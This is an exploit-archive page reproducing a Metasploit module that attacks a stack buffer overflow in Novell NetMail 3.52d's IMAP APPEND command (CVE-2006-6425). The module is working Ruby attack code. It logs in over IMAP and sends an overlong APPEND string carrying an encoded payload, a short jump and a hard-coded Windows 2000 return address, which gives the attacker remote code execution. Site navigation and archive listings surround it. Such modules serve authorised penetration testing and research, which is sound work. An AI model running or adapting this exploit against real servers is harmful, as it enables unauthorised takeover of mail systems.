Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow

Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow: Posted Nov 26, 2009; Authored by MC | Site metasploit.com; This Metasploit module exploits a stack overflow in Novell's Netmail 3.52 IMAP APPEND verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.; tags | exploit, overflow, imap; advisories | CVE-2006-6425; SHA-256 | c2b343f8b2b08c2acbc1a657fc530022dd5ded78e281457e1ff77f70c7f431bb; Download | Favorite | View

Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Imap

  def initialize(info = {})
    super(update_info(info,  
      'Name'           => 'Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in Novell's Netmail 3.52 IMAP APPEND
        verb. By sending an overly long string, an attacker can overwrite the 
        buffer and control program execution. 
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2006-6425' ],
          [ 'OSVDB', '31362' ],
          [ 'BID', '21723' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-054.html' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 700,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        => 
        [
          ['Windows 2000 SP0-SP4 English',   { 'Ret' => 0x75022ac4 }],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 23 2006'))

  end
  
  def exploit
    sploit =  "a002 APPEND  " + "saved-messages (\Seen) "    
    sploit << rand_text_english(1358) + payload.encoded + "\xeb\x06"
    sploit << rand_text_english(2) + [target.ret].pack('V') 
    sploit << [0xe9, -585].pack('CV') + rand_text_english(150)

    info = connect_login 
    
    if (info == true)
      print_status("Trying target #{target.name}...")
      sock.put(sploit + "\r\n")
    else
      print_status("Not falling through with exploit")  
    end
    
    handler
    disconnect
  end
end

Top Authors In Last 30 Days

Red Hat 232 files
indoushka 159 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,120)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,142)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,780)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow

Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow

Share This

Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems